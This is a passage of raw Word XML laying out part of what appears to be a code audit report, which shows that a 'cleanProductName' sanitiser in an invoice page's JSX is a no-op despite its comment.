                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0058087E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">seeing </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="708" name="Shape 708"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="381000" y="1781854"/>
                            <a:ext cx="1276350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4645"/>
                                  <a:pt x="1276350" y="6893"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="135976"/>
                                  <a:pt x="1275420" y="138224"/>
                                  <a:pt x="1273560" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="141945"/>
                                  <a:pt x="1269455" y="142875"/>
                                  <a:pt x="1266825" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>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09" name="Rectangle 709"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="409724" y="1805508"/>
                            <a:ext cx="1627944" cy="140105"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F3B42DD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>cleanProductName</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>(...)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="710" name="Rectangle 710"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1660773" y="1800225"/>
                            <a:ext cx="5537184" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="13568A76" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> at the interpolation site would reasonably assume the value had been handled.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="535A51E4" id="Group 26916" o:spid="_x0000_s1191" style="width:510.25pt;height:151.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,19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&#10;BgAAAAAEAAQA8wAAAGYMAAAAAA==&#10;">
                <v:shape id="Shape 653" o:spid="_x0000_s1192" style="position:absolute;top:2483;width:64801;height:12287;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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0LHxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dagIx&#10;FITvBd8hnELvNFuL0m7NiggLilColRbvDpvT/enmZEmiu769KRS8HGbmG2a5GkwrLuR8bVnB0zQB&#10;QVxYXXOp4PiZT15A+ICssbVMCq7kYZWNR0tMte35gy6HUIoIYZ+igiqELpXSFxUZ9FPbEUfvxzqD&#10;IUpXSu2wj3DTylmSLKTBmuNChR1tKip+D2ejoNV98d2958d9npzW/PrVnHZ9o9Tjw7B+AxFoCPfw&#10;f3urFSzmz/B3Jh4Bmd0AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAMrNCx8YAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1445l6480126,5028r,1218662l6474764,1227268v-2334,967,-4763,1451,-7290,1457l19050,1228725v-2526,-6,-4956,-490,-7290,-1457c9426,1226300,7366,1224924,5580,1223144v-1787,-1792,-3163,-3851,-4130,-6183l,1209675,,19050,1450,11757c2417,9423,3793,7361,5580,5575,7366,3786,9426,2409,11760,1445,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,1228725"/>
                </v:shape>
                <v:rect id="Rectangle 691" o:spid="_x0000_s1193" style="position:absolute;width:17990;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006F5800" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">And the one function that </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 692" o:spid="_x0000_s1194" style="position:absolute;left:13526;width:465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02147721" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:i/>
                          </w:rPr>
                          <w:t>looked</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 693" o:spid="_x0000_s1195" style="position:absolute;left:17024;width:1991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17C3B1F5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> like a </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:t>sanitiser</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:t xml:space="preserve"> was a no-op:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 694" o:spid="_x0000_s1196" style="position:absolute;left:1007;top:3938;width:3114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0432CF13" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">// </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>src</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>/pages/Invoice/CreateInvoice.jsx:1299</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 695" o:spid="_x0000_s1197" style="position:absolute;left:1007;top:5652;width:3114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7D01AC43" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">const </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>cleanProductName</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> = (</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>productName</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>) =&gt; {</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 696" o:spid="_x0000_s1198" style="position:absolute;left:1007;top:7462;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13C6FA2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697" o:spid="_x0000_s1199" style="position:absolute;left:2096;top:7462;width:2028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15222EFA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">if </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>(!</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>productName</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>) return "";</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 698" o:spid="_x0000_s1200" style="position:absolute;left:1007;top:9177;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131A83A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699" o:spid="_x0000_s1201" style="position:absolute;left:2096;top:9177;width:4708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4F2A3694" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>// Remove everything inside parentheses including the parentheses</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 700" o:spid="_x0000_s1202" style="position:absolute;left:1007;top:10891;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44E7489F"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701" o:spid="_x0000_s1203" style="position:absolute;left:2096;top:10891;width:4563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78EA5D60" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">return </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>productName</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">            // &lt;- that is the entire function</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25498" o:spid="_x0000_s1204" style="position:absolute;left:1007;top:12606;width:72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KvxAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L8w/hDrjTdETFVqOID3Q5PsCZ3aW5tmWam9JEW/36yUJweTjv2aI1pbhT7QrLCr76EQji1OqC&#10;MwXn07Y3AeE8ssbSMil4kIPF/KMzw0Tbhg90P/pMhBB2CSrIva8SKV2ak0HXtxVx4K62NugDrDOp&#10;a2xCuCnlIIrG0mDBoSHHilY5pX/Hm1Gwm1TLn719Nlm5+d1dvi/x+hR7pbqf7XIKwlPr3+KXe68V&#10;DEbDOOwNd8IVkPN/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACDQwq/EAAAA3gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5DCB53BC"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25499" o:spid="_x0000_s1205" style="position:absolute;left:1552;top:12606;width:72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c0xwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaPYYmJWEduix1aF6O2RfSbB7NuQ3ZrUX+8WCj0OM/MNk656U4sbta6yrGAyjkAQ&#10;51ZXXCg4Hj6e5yCcR9ZYWyYFP+RgtRw8pZho2/EX3fa+EAHCLkEFpfdNIqXLSzLoxrYhDt7FtgZ9&#10;kG0hdYtdgJtaTqPoVRqsOCyU2NCmpPy6/zYKtvNmfdrZe1fU7+dt9pnFb4fYKzUa9usFCE+9/w//&#10;tXdawfRlFsfweydcAbl8AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE+cZzTHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4220D756"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703" o:spid="_x0000_s1206" style="position:absolute;top:16287;width:2087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5B5FB3C1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Its own comment describes a </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 704" o:spid="_x0000_s1207" style="position:absolute;left:15716;top:16104;width:6382;height:1333;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w78wwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeEJvNVGWVlaziwgWL4VW2/tz89wsbl6WJOr23zeFQo/DzHzDrOvR9eJGIXaeNcxnCgRx&#10;403HrYbP4+5pCSImZIO9Z9LwTRHqavKwxtL4O3/Q7ZBakSEcS9RgUxpKKWNjyWGc+YE4e2cfHKYs&#10;QytNwHuGu14ulHqWDjvOCxYH2lpqLoer06D2rydDu6/iuClisMuFv769e60fp+NmBSLRmP7Df+29&#10;0fCiCvg9k4+ArH4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA5+8O/MMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l628650,v2630,,4875,930,6735,2784c637245,4645,638175,6893,638175,9525r,114300c638175,126451,637245,128693,635385,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126451,,123825l,9525c,6893,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
                <v:rect id="Rectangle 705" o:spid="_x0000_s1208" style="position:absolute;left:15969;top:16340;width:775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1F84A2AA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
